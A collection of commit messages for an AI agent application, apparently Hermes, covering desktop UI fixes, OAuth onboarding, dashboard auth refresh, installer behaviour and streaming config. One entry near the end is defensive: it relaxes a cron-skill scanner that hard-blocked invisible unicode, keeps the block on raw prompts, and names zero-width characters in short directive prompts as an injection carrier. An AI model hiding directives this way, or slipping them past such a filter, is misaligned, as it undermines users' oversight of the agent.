buildup on repeated cancel/retry.
source_label is meant to be a human-readable origin (file path / source),
not the internal auth_mode string ("oauth_pkce"). Surface the auth-store
path, then the source slug, then a generic label.
Add build-package and build-devshell as cross-platform check
derivations so nix flake check verifies the default package and
devShell build on every platform (including darwin, which previously
only did eval-only checks).
This lets us drop the separate nix build step from the CI workflow
and removes the macOS-only eval fallback — a single nix flake check
now covers builds + runtime checks on all runners.
- onboarding: openSignInUrl now falls back to window.open when the desktop
bridge's openExternal throws/rejects (OS handler missing, user denied),
not just when the bridge is absent
- web_server: cancelling a loopback session shuts down the 127.0.0.1
callback server + joins its thread immediately, freeing the port instead
of holding it until the wait times out (+ regression test)
- web_server: document the new "loopback" flow in the /api/providers/oauth
enum, the poll-endpoint docstring, and the Phase 2 flow comment block
- web_server: join the callback-server thread in the start error path so a
failed discovery/URL build doesn't leave a daemon thread running
- web_server: loopback worker now bails if the session was cancelled while
waiting for the callback or exchanging the code, instead of persisting
tokens the user no longer wants (+ regression test)
- onboarding: fall back to window.open when the desktop bridge's
openExternal is unavailable, so the flow never silently stalls
xAI Grok was only reachable via the "I have an API key" form. xAI's
OAuth (SuperGrok / Premium+) flow already exists in the backend
(`hermes auth add xai-oauth`) but was never surfaced in the desktop
onboarding launcher.
Add a loopback PKCE flow: the local backend binds the 127.0.0.1
callback listener, the client opens the browser, and the redirect lands
back automatically — no code to copy/paste. Reuses the existing xAI
OAuth helpers (discovery, callback server, token exchange, persist)
rather than duplicating them.
- web_server: catalog entry (flow: loopback) + status dispatch +
_start_xai_loopback_flow + background worker + route branch
- desktop: 'loopback' flow type, awaiting_browser status, xAI Grok card
(PROVIDER_DISPLAY / FLOW_SUBTITLES / FlowPanel waiting render)
- tests: catalog listing, start authorize-url, worker persist, state
mismatch rejection
* fix(desktop): triage 24 GUI quality-of-life fixes across sidebar, composer, tool cards, messaging, and platform plumbing
A grab-bag of high-leverage UX fixes plus a few backend touches that the
GUI needs to behave correctly on Windows.
Sidebar / sessions
- Decrement $sessionsTotal on delete + archive so "Load N more" stops
claiming removed rows are still on the server.
- Hide the "Group by workspace" toggle when no unpinned sessions exist.
- Accept Cmd/Ctrl+N as a "new session" accelerator (in addition to bare
Shift+N), and render the kbd hint per-platform.
- Switch the statusbar to overflow-x-clip so untitled sessions don't
paint a horizontal scrollbar at the bottom of the window.
Messaging + Cron
- Add [-webkit-app-region: no-drag] to the page-search input so clicks
reach the field instead of routing to the OS window-drag handler.
- Replace single-letter PlatformAvatar with brand glyphs from
@icons-pack/react-simple-icons (telegram, discord, matrix, signal,
whatsapp, mattermost, wechat, qq, ...). Letter monogram fallback for
Slack / Dingtalk / Feishu / WeCom (removed from Simple Icons at brand
owner request).
- Drop the duplicate "Create first cron" button in the empty state.
Composer
- Dedupe pasted images by (name, size, lastModified, type) instead of
Blob identity; Chromium hands us the same screenshot via both
clipboard.items and clipboard.files with fresh File instances.
- Enable spellcheck on the contentEditable, configure Chromium's
spellchecker with the system locale on whenReady, and add
replaceMisspelling + "Add to dictionary" entries to the context menu.
- Render user messages through a minimal markdown pipeline (inline
backtick code + fenced ``` blocks) while keeping @file:/@image:
directive chips intact.
- max-h-[60vh] overflow-y-auto + collisionPadding on the prompt-snippet
submenu.
- Bake cursor-pointer into the <Button> primitive (with
disabled:cursor-default) and into titlebarButtonClass.
Dialogs + tabs + version
- Default DialogContent now has max-h-[85vh] overflow-y-auto so long
bodies scroll instead of falling off-screen.
- Right-rail preview tabs close on middle-click (button === 1), with an
onMouseDown swallow to suppress Chromium autoscroll.
- New refreshDesktopVersion() helper called from About mount, after
every update check, and on throttled window focus so About reflects
the just-installed binary.
Keys + Artifacts + Terminal
- Drop the global "Show advanced" toggle in KeysSettings. Provider
groups now default-expand when they have any key set.
- Extend openExternalUrl to handle file:// via shell.openPath, with
showItemInFolder fallback when the OS can't open the file.
- New lib/ansi.ts SGR parser + <AnsiText> component, applied to
terminal/execute_code tool output.
- ToolView gained stdout / stderr / rendersAnsi; tool-fallback renders
the two streams as separate labeled blocks with stderr in a neutral
tone (not destructive — many CLIs log info on stderr).
- Drop 'stderr' from ERROR_MSG_KEYS in tool-result-summary.
Paths + platform
- resolveHermesCwd skips process.cwd() when packaged and prefers a
user-configurable default project directory.
- New hermes:setting:defaultProjectDir:{get,set,pick} IPC handlers +
preload bridge + global.d.ts typing + a "Default project directory"
row in Sessions settings.
- FileOperations.delete_path(path, recursive=True) on the abstract
base; ShellFileOperations.delete_file rewritten to run a cross-
platform python3 -c snippet so deletes work on Windows shells (which
have no rm/rm -rf). Fallback to `python` when `python3` isn't on PATH.
- README troubleshooting block split into macOS/Linux + Windows
PowerShell recipes.
- Tightened renderer favicon links in index.html + added color-scheme
and theme-color meta.
Backend lifecycle (renderer-side mitigation)
- New noteSessionActivity() heartbeat + session.ts watchdog: an
8-minute silence on the stream auto-clears stuck $workingSessionIds
entries so "Session Busy" never gets permanently wedged. Wired into
useSessionStateCache so every state update refreshes the timer.
i18n spike
- docs/desktop-i18n-rfc.md scoping a future language-switcher PR
(recommends react-intl, audits IME/RTL/CJK in the composer +
chat bubbles, 4-PR rollout plan, ~3-4 eng-weeks for the first
non-English locale).
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): replace native OS scrollbar in portaled dropdown menus
Radix's DropdownMenuPrimitive.Portal renders content under document.body,
outside the `.scrollbar-dt` scope on #root. Whenever a menu's max-height
clipped its content (even by a pixel — common for the composer "+" menu
that opens upward near the bottom of the window), the user saw the OS's
chunky native scrollbar painted across the whole menu.
Bake a thin, slot-styled scrollbar onto DropdownMenuContent and
DropdownMenuSubContent via [scrollbar-width:thin] + WebKit pseudo-element
arbitrary variants. The submenu also gets a max-h tied to
--radix-dropdown-menu-content-available-height so long snippet lists scroll
cleanly instead of running off the bottom of the viewport. Drop the now-
redundant max-h-[60vh] override on the prompt-snippet submenu.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): unbork dropdown menu — submenu opens, parent isn't a circle
Two regressions from the previous dropdown-scrollbar fix:
- The parent menu rendered as a rounded oval. Long Tailwind v4 arbitrary-
variant strings like [&::-webkit-scrollbar-thumb]:rounded-full inside a
cn() call were being mis-resolved so the `rounded-full` leaked onto the
menu container itself. Replaced the whole tower of arbitrary variants
with a real `.dt-portal-scrollbar` class in styles.css that mirrors what
`.scrollbar-dt` already does for #root descendants. Plain CSS, no Tailwind
parser ambiguity.
- The Prompt snippets submenu didn't open. Radix publishes
--radix-dropdown-menu-content-available-height on Content but NOT on
SubContent, so the `max-h` bound to that variable computed to 0 and the
submenu collapsed to zero height. Switched SubContent to a fixed
max-h-80 (≈20rem) which is plenty for a snippet list and never collapses.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): promote prompt snippets from Radix submenu to a real Dialog
The submenu refused to open when the parent dropdown was anchored at the
bottom of the window (composer "+" button) — Radix's collision detection +
SubContent positioning was fighting us. Rather than keep tuning side /
sideOffset / collisionPadding / max-h until something stuck, replace the
DropdownMenuSub with a clicked DropdownMenuItem that opens a proper
Dialog.
Side benefits over the submenu:
- Each snippet gets a description line, so a glance is enough to pick one.
- Focus management is handled by Dialog automatically.
- Easy to grow (search, custom user snippets, categories) without
another round of Radix positioning bugs.
Also extract types/interfaces to the bottom of the file per workspace
convention.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): move cron 'New cron' button off the top bar into the body
Reverses the previous direction on cron empty-state dedup. The body
button is more discoverable for first-time users (it's anchored next to
the "No scheduled jobs yet" copy that explains the feature) and frees
the top bar from a global CTA that wasn't pulling its weight.
- Empty (zero jobs): EmptyState renders the "Create first cron" button
again, like the original design.
- Empty (search filtered out all jobs): no button, just "Try a broader
search query" copy.
- Has jobs: small inline header above the list shows `N/M active` plus
a single "New cron" button (right-aligned). The rows themselves
already cover edit/pause/trigger/delete, so this is the only "create"
affordance.
Also drop the dead `<div className="hidden">…</div>` enabledCount line
the previous patch left behind; the count is now visible in the new
header instead of hidden.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): address Copilot review on PR 37536
- sessions-settings: guard the WHOLE bridge call rather than chaining
`?.settings.foo().then(...)` — the latter throws when
`window.hermesDesktop` is undefined (non-Electron / Vitest contexts)
because the chain short-circuits to `undefined.then(...)`.
- file_operations: drop `Path.unlink(missing_ok=True)` (Py>=3.8) so the
generated delete snippet still works on remote backends running
Python 3.7. The existing FileNotFoundError handler covers the same
case and works back to 3.4.
- ansi.test.ts: add focused Vitest coverage for the SGR parser
(basic/bright colors, bold toggles, default-fg reset, coalescing,
256-color / truecolor arg consumption, non-SGR CSI drop, empty SGR
full-reset) so future refactors can't silently regress terminal
rendering.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop/updates): swallow refreshDesktopVersion bridge errors
`refreshDesktopVersion()` is called best-effort with `void` from
`checkUpdates()`, `startUpdatePoller()`, and the window focus handler.
If the IPC bridge rejects (main process shutting down during reload,
bridge not yet ready on first paint), the rejection surfaces as an
unhandled promise rejection in the renderer. Wrap the call in try/catch
and return null on failure so callers can keep the existing
fire-and-forget pattern safely.
Co-authored-by: Cursor <cursoragent@cursor.com>
* chore(desktop): drop work duplicated by other in-flight PRs
- composer/text-utils.ts: revert paste-image dedupe — PR #37596
ships the same fix with a cleaner content-key approach and a
Vitest file (text-utils.test.ts). Letting that PR own the change.
- docs/desktop-i18n-rfc.md: delete the i18n scoping RFC — PR #37568
has already shipped a working i18n surface (homegrown nanostores
`t()` helper over en/zh dictionaries), so the RFC's framework
recommendation (`react-intl`) is now obsolete and would just
contradict the implementation that's actually landing.
Co-authored-by: Cursor <cursoragent@cursor.com>
---------
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(desktop): stabilize project folder sessions
Keep desktop folder selection aligned with new sessions and scope TUI gateway cwd through session context so prompts and tools resolve against the selected workspace.
* fix(desktop): address review feedback on folder sessions
Snapshot sessions before iterating to avoid concurrent-mutation crashes,
optional-chain the revealLogs catch, and read console-message args from
the correct Electron event/messageDetails positions.
* fix(desktop): address second review pass on folder sessions
Sync the remembered workspace key with the cwd atom (clear on empty),
only load tree children for real directory nodes, and throttle renderer
auto-reloads so a deterministic startup crash can't loop forever.
* fix(desktop): inherit parent workspace for ephemeral agent tasks
Background and preview tasks use ephemeral ids absent from the session
map, so pass the parent session cwd into the session context explicitly
instead of clearing it back to the gateway launch dir. Also correct the
set_session_vars docstring about clear_session_vars semantics.
* fix(desktop): validate preview cwd before pinning session context
A non-empty but non-existent client cwd would pin an unusable override
and silently fall back to the launch dir. Validate once, reuse for both
the session context and the terminal override, and fall back to the
parent session workspace when invalid.
* fix(desktop): harden preview cwd normalization and adopt normalized cwd
Guard preview cwd normalization against malformed client paths so a bad
input can't fail the whole restart, and adopt the backend's normalized
config.get cwd in the no-active-session path so the persisted workspace
stays consistent with what the agent uses.
#37046 swapped gemini-3-flash-preview -> gemini-3.5-flash in the
google-gemini-cli (OAuth/Code Assist) picker on the premise that the
preview slug was renamed. It wasn't. Per gemini-cli's models.ts, Code
Assist serves two distinct flash slugs with different access gates:
gemini-3-flash-preview (PREVIEW_GEMINI_FLASH_MODEL — what subscription/
free-tier OAuth users reach) and gemini-3.5-flash
(DEFAULT_GEMINI_3_5_FLASH_MODEL — GA-channel-gated). The model string is
passed verbatim into the {project, model, ...} envelope sent to
cloudcode-pa.googleapis.com, so non-GA users got a hard error on every
prompt because gemini-3.5-flash 404s for them.
Offer both slugs in the OAuth picker (matching gemini-cli's own /model
list) so non-GA users can select the preview flash that works. The
gemini (API-key), OpenRouter, and Nous lists are untouched —
google/gemini-3.5-flash is a real live model on those surfaces.
Add a SHA-256 content-hash based build stamp to `hermes desktop` so
unchanged source trees skip the npm install + build step. Uses pathspec
for .gitignore-aware file matching instead of a hardcoded skip-list.
New CLI flags:
- --build-only: run the build but don't launch the app
- --force-build: rebuild even when the stamp matches
`hermes update` now calls `hermes desktop --build-only` so the
desktop app is rebuilt (if needed) as part of the update flow.
16/16 tests passing.
* feat(installer): rename macOS installer to "Hermes" and make it a launcher
The bootstrap installer was branded "Hermes Setup" and always re-ran the full
install flow on every open — so the /Applications app said "Setup" and couldn't
double as a way to relaunch Hermes (the real desktop app lives in ~/.hermes,
not /Applications, with no Dock/Launchpad entry).
Two changes, macOS-focused:
1. Rename the installer's user-visible name to "Hermes" (productName, window
title, shortDescription, document title). Bundle id stays
com.nousresearch.hermes.setup (distinct from the desktop app's
com.nousresearch.hermes); the on-disk staged updater name (hermes-setup) is
unchanged, so the desktop's update hand-off still resolves it.
2. Launcher fast path: on a bare ("Install") launch, if Hermes is already
installed (bootstrap-complete marker + a built desktop app on disk), skip the
installer UI entirely and relaunch the desktop app, then exit. First run still
installs; Update mode and fresh/repair installs still show the UI. The window
now starts hidden ("visible": false) and is revealed only when the UI is
actually needed, so the launcher path never flashes a window.
Net UX: one "Hermes" in /Applications you can pin to the Dock — first click
installs, every later click opens the app instantly (same icon throughout, so
the Dock stays seamless). Nothing pins to the Dock permanently; the app shows a
normal Dock icon only while running.
Windows naming is intentionally left as-is in this change (scope: macOS).
* fix(installer): gate launcher fast path to macOS + log window-show failures
Address review feedback:
- Gate the already-installed launcher fast path to macOS (cfg!(target_os =
"macos")). On Windows/Linux the installer keeps its prior behavior, so the
change is a pure no-op there. This avoids relaunching the desktop app on
Windows via a spawn that lacks the DETACHED_PROCESS + startup-grace handling
launch_hermes_desktop uses (which could race the installer's exit).
- Add a brief startup grace before exiting on the mac fast path, mirroring
launch_hermes_desktop.
- Log (instead of silently ignoring) failures to show the main window, and log
when the "main" window can't be found, so a no-UI state is diagnosable.
* fix(installer): add --reinstall escape hatch + keep spawn detached on Windows
Address follow-up review:
- Add a `--reinstall`/`--repair` flag that forces the installer UI even when
Hermes is already installed, so a broken install can be repaired by re-running
setup instead of the launcher fast path silently relaunching the (possibly
bad) app.
- Apply DETACHED_PROCESS on Windows in spawn_installed_desktop, mirroring
launch_hermes_desktop, so the helper stays correct cross-platform even though
its only caller is macOS-gated today.
* Potential fix for pull request finding
Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
* test(installer): unit-test --reinstall/--repair force-setup parsing
Extract the force-setup flag parsing into a unit-testable
`force_setup_from_args` helper (mirrors `AppMode::from_args`) and add tests:
- --reinstall and --repair are recognized
- bare/unrelated args (incl. --update) do not force setup
- the repair flags never affect Install<->Update mode selection
---------
Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
* fix(desktop): codex OAuth onboarding now resolves on fresh install
The desktop codex device-code worker persisted tokens with a hand-rolled
pool.add_entry(), writing only credential_pool.openai-codex. It never set
active_provider, so on a fresh install the onboarding setup.runtime_check
resolved provider "auto", couldn't detect the Codex OAuth session, and raised
"No inference provider configured" — while setup.status (which sniffs the pool)
reported configured. The disagreement surfaced as the onboarding banner
"Connected, but Hermes still cannot resolve a usable provider."
Use the canonical _save_codex_tokens() instead, matching the CLI's
`hermes auth add openai-codex` path and the Nous/MiniMax dashboard workers.
It writes the providers.openai-codex singleton (setting active_provider) and
syncs the pool.
* fix(auth): align Codex OAuth persistence paths
Ensure desktop and CLI Codex OAuth logins both write the canonical provider state so fresh installs resolve a usable runtime provider.
---------
Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>
* feat(dashboard): nous-blue theme, bulk sessions, schedule picker
Batch of related dashboard improvements gathered on
austin/fix/dashboard-changes:
* Nous Blue theme — faithful port of the LENS_5I overlay system onto
the existing DashboardTheme. Lifts the foreground inversion layer to
z-index 200 to fix the long-standing hover / loading visual artifact,
adds an explicit swatchColors slot so the theme picker shows the
post-inversion preview, and migrates the legacy "lens-5i" theme key
from localStorage / API to "nous-blue" on first read.
* Theme-aware series colors: new --series-input-token /
--series-output-token CSS vars consumed by Analytics + Models
charts; ToolCall + ModelInfoCard switched to semantic
--color-success for diff lines and the Tools capability badge.
* Analytics + Models headers: consolidate period selector + refresh
next to the page title and drop the redundant period badge.
* Bulk session management — "Delete empty (N)" button + per-row
checkboxes with shift-click range select and a bulk-delete action
bar. Backed by SessionDB.delete_sessions() /
delete_empty_sessions() plus POST /api/sessions/bulk-delete and
DELETE /api/sessions/empty (registered before the templated
/api/sessions/{session_id} family so they don't get shadowed).
Hard cap of 500 IDs per bulk request. Full pytest coverage.
* Cron page — human-readable schedule picker (every-interval / daily
/ weekly / monthly / once / custom) replaces the raw cron
expression input; the job list now renders "Weekly on Mon, Wed,
Fri at 14:30" instead of "30 14 * * 1,3,5". English-only ordinals
for monthly schedules so non-English locales don't get incorrect
suffixes.
* example-dashboard plugin moved from plugins/ to tests/fixtures/ so
stock installs no longer ship the demo. Tests install it
dynamically via a pytest fixture that also reorders the FastAPI
routes.
* i18n: 40+ new keys for the bulk-select UI and schedule
picker/describer translated across all 16 locales.
Co-authored-by: Cursor <cursoragent@cursor.com>
* refactor(dashboard): dedupe memory provider picker
The memory provider <Select> lived on both /system and /plugins,
writing the same config.yaml field through two different endpoints
with no cross-page refresh. Remove the picker from /system in favor
of a read-only status row + link to /plugins, where it pairs with
the context-engine picker under "Plugin providers".
/system retains the destructive admin controls (file sizes, Reset
MEMORY.md / USER.md / all). The api.setMemoryProvider client and
PUT /api/memory/provider backend endpoint are left in place for
CLI / script callers.
Co-authored-by: Cursor <cursoragent@cursor.com>
* docs(dashboard): address Copilot review on PR #37383
- Backdrop layer-stack comment claimed LENS_5I-style themes override
--component-backdrop-bg-blend-mode to multiply, but our only
LENS_5I-style theme (nous-blue) keeps the default difference.
Reword to describe what the code actually does and present the
var as a forward-looking extension hook.
- /api/sessions/bulk-delete docstring promised the response would
echo back the list of deleted IDs, but the implementation only
returns {ok, deleted}. Tighten the docstring to match the wire
format; the client already knows what it asked to delete, so the
IDs aren't needed.
Co-authored-by: Cursor <cursoragent@cursor.com>
* fix(dashboard): address copilot review on cron describe + bulk-select checkbox
- schedule.ts: restrict `describeCronExpression` to strictly 5-field cron
expressions. The backend `parse_schedule` also accepts the 6-field
`min hour dom month dow year` form, and humanising those by
destructuring only the first five fields would silently drop the year
(e.g. ``0 9 * * * 2099`` rendered as "Daily at 09:00"). 6+ field
expressions now fall through to the raw-string fallback so the user
sees what's actually scheduled.
- SessionsPage.tsx (SessionRow): wire the bulk-select Checkbox's
``onClick`` directly instead of attaching it to a parent ``<span>``
with a no-op ``onCheckedChange``. Radix forwards onClick to the
underlying ``<button role=checkbox>``, so the same handler now drives
both mouse clicks (preserving shift-key state for range select) and
keyboard activation (Space on the focused checkbox, which the browser
synthesises as a click on the <button>). Improves a11y / keyboard UX
without changing the controlled-selection model.
- SessionsPage.tsx: also extend ``SessionRowProps`` with the new
``onRename`` / ``onExport`` props introduced on main so the row's
destructured prop types resolve after the merge.
Co-authored-by: Cursor <cursoragent@cursor.com>
---------
Co-authored-by: Cursor <cursoragent@cursor.com>
The native Electron desktop app shipped (PR #20059 and follow-ups) but the
docs only told people how to download it, not what it is or how to use it.
Adds website/docs/user-guide/desktop.md covering install (installer +
prebuilt + Windows GUI), the chat-first UI and management panes, the
hermes desktop CLI flag reference, self-update, how-it-works, and
troubleshooting. Sourced from apps/desktop/README.md, routes.ts, and the
real argparse. Wired into sidebars.ts under Interfaces after the TUI.
The install overlay had no way to stop a running install — the runner already
supported an abortSignal, but nothing drove it. Wire it end to end:
- main.cjs holds an AbortController for the active runBootstrap and aborts it
on a new hermes:bootstrap:cancel IPC and on app quit, so quitting/cancelling
mid-install actually kills install.sh/ps1 instead of orphaning it.
- runBootstrap bails before spawning anything if the signal is already aborted.
- Install overlay gains a "Cancel install" button while a bootstrap is active;
a cancel surfaces the recovery overlay (retry/repair).
Test: electron/bootstrap-runner.test.cjs asserts the already-aborted early
return (no spawn) via `node --test`.
The model picker now matches `hermes model` for OpenAI, and OpenRouter
stops appearing as authenticated when only OPENAI_API_KEY is set.
- models.py: provider_model_ids() for the default api.openai.com endpoint
intersects the live /v1/models dump (120+ entries incl. embeddings,
whisper, tts, dall-e, moderation, legacy chat) with the curated agentic
list, preserving curated order. Custom OpenAI-compatible endpoints keep
the live list verbatim so discovery still works.
- providers.py: drop extra_env_vars=("OPENAI_API_KEY",) from the openrouter
overlay. list_authenticated_providers reads extra_env_vars to decide
whether a provider is authenticated, so any OpenAI user saw a phantom
OpenRouter row. Runtime OpenRouter credential resolution still falls back
to OPENAI_API_KEY (runtime_provider.py), independent of the overlay.
- Regression tests for both paths.
Streaming quality differs sharply by platform: Telegram has native animated
draft streaming (sendMessageDraft) which is smooth, while Discord/Slack only
have edit-based streaming (repeated editMessage) which visibly flickers. Ship
defaults that match reality instead of one global flag.
- hermes_cli/config.py: DEFAULT_CONFIG display.platforms now ships
telegram.streaming=true and discord.streaming=false (was empty {}). These
are gap-fillers — config deep-merge has user values win, so anyone who
explicitly sets discord.streaming=true keeps it. The global
streaming.enabled master switch still gates everything; these per-platform
flags only take effect once streaming is on.
- Dashboard exposure comes for free: the web settings schema is generated
from DEFAULT_CONFIG, so display.platforms.telegram.streaming and
.discord.streaming now surface as editable boolean toggles in the UI with
no frontend change. (Previously the per-platform tree was {} and invisible.)
- tests: pin the defaults, the resolver outcome (telegram on / discord off /
unlisted platforms follow global), user-override-wins, and dashboard schema
exposure.
No _config_version bump: deep-merge fills the gap for existing installs; no
value migration needed.
Adds a search box above the session list. Loaded sessions match instantly
client-side; a debounced full-text search (existing /api/sessions/search FTS)
covers the rest so all sessions stay findable at 699+. Results replace the
pinned/agents sections while a query is active and resume on click.
- Sidebar: rows within a workspace group now sort by creation time instead of
last activity, so they stop reshuffling every time a message lands (muscle
memory). Groups still float up by recency.
- Sessions only persist a workspace cwd when one was explicitly chosen; an
auto-detected launch directory is no longer stamped on the row, so untargeted
sessions group under "No workspace" instead of "desktop". The agent still
runs in the detected directory.
Long-running sessions auto-compress: the gateway ends the original session
and surfaces the live continuation under a new id (list_sessions_rich projects
the root forward to its tip). Two symptoms fell out of the id rotation:
- A pinned session "vanished" — the pin is stored as the pre-compression root
id, but the sidebar only matched on the live id, so it was filtered out.
Pins now resolve on the durable lineage-root id (`_lineage_root_id`, already
surfaced by the projection): the sidebar indexes sessions by both ids, pin/
unpin and reorder operate on the durable id, and `sessionPinId()` is shared
with the Cmd+P toggle. Existing pins keep working with no migration.
- A freshly-continued session was missing from the list until you ungrouped +
"load 50 more" — the list paginated by original start time, so an old-but-
active conversation sat past the first page. The desktop now requests
`order=recent` (GET /api/sessions gains an `order` param backed by the
existing recency CTE), surfacing live continuations on the first page.
* feat(dashboard-auth): rotate dashboard sessions via refresh token
The dashboard auth-code grant now issues a 24h rotating refresh token
(server side: NousResearch/nous-account-service#293). This wires up the
Hermes client half so an expired access token is transparently refreshed
instead of bouncing the user to /login every 15 minutes.
plugins/dashboard_auth/nous:
- refresh_session() now POSTs grant_type=refresh_token to Portal's token
endpoint and returns a Session carrying the ROTATED refresh token (was
an unconditional RefreshExpiredError under the old "no RT in V1"
contract). The RT is sent in BOTH the request body (Portal's schema
requires it there) and the X-Refresh-Token header (log redaction) —
verified against the #293 preview deploy: header-only is rejected as
invalid_request, body is accepted.
- A 400 from Portal (expired / revoked / reuse-detected) maps to
RefreshExpiredError so the middleware forces a clean re-login; network
errors map to ProviderError; empty RT fast-fails without a network call.
- complete_login now captures the initial refresh token Portal returns
(forward-tolerant: empty string if a deploy omits it).
- Extracted the shared token-response handling into
_token_response_to_session, parameterised on the 400 exception type so
the auth-code path raises InvalidCodeError and the refresh path raises
RefreshExpiredError.
- revoke_session stays a best-effort no-op: Portal exposes no public
token-endpoint revocation grant (revocation is the authenticated
/sessions UI, keyed by sessionId+userId), so logout is cookie-clearing
and the 24h session expires on its own. Documented for a future
revoke grant.
hermes_cli/dashboard_auth/middleware:
- On an expired/invalid access token the gate now attempts refresh via
the session's RT BEFORE forcing re-login. On success it serves the
request and re-sets the rotated cookies on the response (mandatory:
Portal rotates the RT every refresh and reuse-detects, so a stale RT
cookie would revoke the whole session on the next refresh). On
RefreshExpiredError (or no RT) it falls through to clear-and-relogin.
- ProviderError during refresh (Portal unreachable) forces a clean
re-login rather than 500-ing the request.
- Uses the existing REFRESH_SUCCESS / REFRESH_FAILURE audit events.
Validation:
- 176 dashboard-auth unit/integration tests pass.
- Live E2E against the #293 preview deploy: refresh_session(bad rt) ->
RefreshExpiredError through the real token endpoint; live JWKS fetch +
RS256 verification rejects a forged token; empty-RT fast-fail. The
successful happy-path rotation is covered by unit tests (a live run
needs an interactive browser OAuth round trip + registered agent:*
client).
Depends on: NousResearch/nous-account-service#293 (server-side RT issuance).
* fix(dashboard-auth): use Portal's x-nous-refresh-token header name
The refresh-token header must match Portal's REFRESH_TOKEN_HEADER exactly
("x-nous-refresh-token"); the initial cut used "X-Refresh-Token", which
Portal silently ignores (harmless since the RT is also in the body, which
is what the schema requires — but the header redaction was a no-op).
Confirmed against the NAS token route + re-validated live against the
#293 preview deploy.
* fix(dashboard-auth): refresh session when access-token cookie has been evicted
The gated middleware bounced users to /login the instant the access-token
cookie was absent, without ever consulting the refresh token:
at, _rt = read_session_cookies(request)
if not at:
return _unauth_response(...) # bailed here
This made transparent refresh effectively dead for the common case. The
access-token cookie is set with Max-Age = access_token_expires_in (~15 min),
so a real browser EVICTS hermes_session_at the moment the token lapses while
hermes_session_rt persists (30-day Max-Age). From that point the browser
sends only the refresh-token cookie — and the old guard rejected it before
_attempt_refresh could run. The _attempt_refresh path only fired for a
present-but-invalid access token, which never happens in a browser.
Fix: only hard-bounce when NEITHER cookie is present. A request carrying
just the refresh token now skips verification (no AT to verify) and flows
into the existing refresh path, which rotates both cookies and serves the
request transparently. A dead/expired RT still raises RefreshExpiredError
and falls through to clear-and-relogin.
This failure mode escaped the original tests + manual refresh button because
both kept the access-token cookie present; only a real browser evicting the
cookie at Max-Age exposes it. Added 3 regression tests covering: AT-evicted +
RT-present (transparent refresh), no-cookies (still bounces), and RT-only with
a dead RT (clean 401, no 500).
Command Center's Models section and Settings > Model rendered the same
model state with identical persistence semantics — both write config and
apply to new sessions only (POST /api/model/set). The Command Center UI
was strictly better (provider catalog, curated model lists, friendly
auxiliary-task labels, Nous-gateway auto-routing on main-provider switch),
while Settings > Model was three barebones config fields.
Extract that UI into a shared settings/model-settings.tsx (restyled with
Settings primitives) and render it at the top of Settings > Model: main
model picker via setModelAssignment + the 9 auxiliary task slots with
per-task set-to-main / change / reset-all. model_context_length and
fallback_providers stay as config fields below it; the raw auxiliary.*
keys are dropped from Advanced (now covered by the panel).
Strip the Models section from Command Center entirely (section, state,
handlers, render, nav, search entry) leaving it focused on Sessions /
System / Usage, and move the live store-sync callback (onMainModelChanged)
from CommandCenterView to SettingsView. The composer's per-session model
picker (the only live hot-swap, via /model) is unchanged.
The left-nav Skills pane and Settings > Skills & Tools rendered the same
getSkills()/getToolsets() data with the same helpers and toggles — genuine
duplication that drifted (different default category labels, sort orders).
Make the left pane the single home: it keeps its category-tabbed browsing
and now gains the functional bits it lacked — a real toolset enable/disable
switch (was a read-only pill) and the expandable ToolsetConfigPanel for
provider selection + per-key credential config. Remove the Tools section
from Settings (nav item, view branch, query slot, type union entries) and
delete tools-settings.tsx, migrating its toggle coverage into the skills
pane test. Relabel the entry point to 'Skills & Tools' in the sidebar and
command center.
The gateway reads top-level streaming.* with StreamingConfig defaults when the
block is absent, so streaming was invisible — a user with no streaming block
sees responses arrive as single messages and has no way to discover the toggle
short of reading source. This materializes the block in config.yaml so it's
discoverable, with values byte-identical to the dataclass defaults (no behavior
change).
- DEFAULT_CONFIG gains a root-level streaming block (enabled, transport,
edit_interval, buffer_threshold, cursor, fresh_final_after_seconds), each
documented inline. Values match gateway/config.py StreamingConfig() exactly.
- _KNOWN_ROOT_KEYS gains 'streaming' so the validator accepts the root key.
- No _config_version bump: load_config deep-merges DEFAULT_CONFIG over user
YAML, so existing installs pick up the default automatically; no value
migration needed.
Does NOT touch the setup wizard — streaming stays opt-in, just discoverable.
Introduce a typed agent→gateway delivery contract so the gateway (not the
agent) decides how each streaming event is rendered per platform. Moves toward
smart-agent/smart-gateway separation while reproducing today's behavior exactly
in the base class.
- gateway/stream_events.py: typed event vocabulary (MessageChunk/Stop,
Commentary, ToolCallChunk/Finished, LongToolHint, GatewayNotice).
- gateway/stream_dispatch.py: GatewayEventDispatcher routes events through the
adapter; adapters can eat events they can't render (e.g. tool chrome on
plain-text platforms).
- gateway/platforms/base.py: render_message_event + format_tool_event default
hooks reproduce the historical emoji/preview tool formatting and consumer
delegation 1:1; adapters override for native rendering.
- gateway/platforms/telegram.py: send_draft now applies MarkdownV2 (format_message
+ parse_mode) with a plain-text fallback on BadRequest, fixing the jarring
raw-text→formatted shift when the draft finalizes as a real sendMessage.
- gateway/config.py: default streaming transport edit → auto. Safe globally:
adapters without draft support report supports_draft_streaming()==False and
transparently use edit, so only Telegram DMs gain native drafts.
Presentation-only contract — nothing rendered here is persisted to conversation
history, preserving cache/message-flow invariants.
A stray zero-width space (U+200B), BOM, or bidi control in loaded skill
markdown permanently killed any cron that loaded it. The skills-attached
assembled-prompt scan hard-blocked on any invisible-unicode char, even
though skill bodies are already install-time vetted by skills_guard.py and
the chars commonly appear in copy-pasted unicode docs / code examples.
The skills path now strips invisibles (logging the codepoints) and runs the
cleaned prompt. The raw user-prompt path (_scan_cron_prompt) keeps the hard
block — that is the actual #3968 injection surface, where a small directive
prompt with a ZWSP is a smoking gun, not prose. Stripping does not let a real
injection slip through: the directive still matches after sanitization.
_scan_cron_skill_assembled now returns (cleaned_prompt, error).
The toolset config panel highlighted the first keyless provider (e.g.
Nous Portal) on load instead of the provider actually written to config.
The /api/tools/toolsets/{name}/config endpoint never reported which
provider was active, so the GUI's default-expand logic fell back to
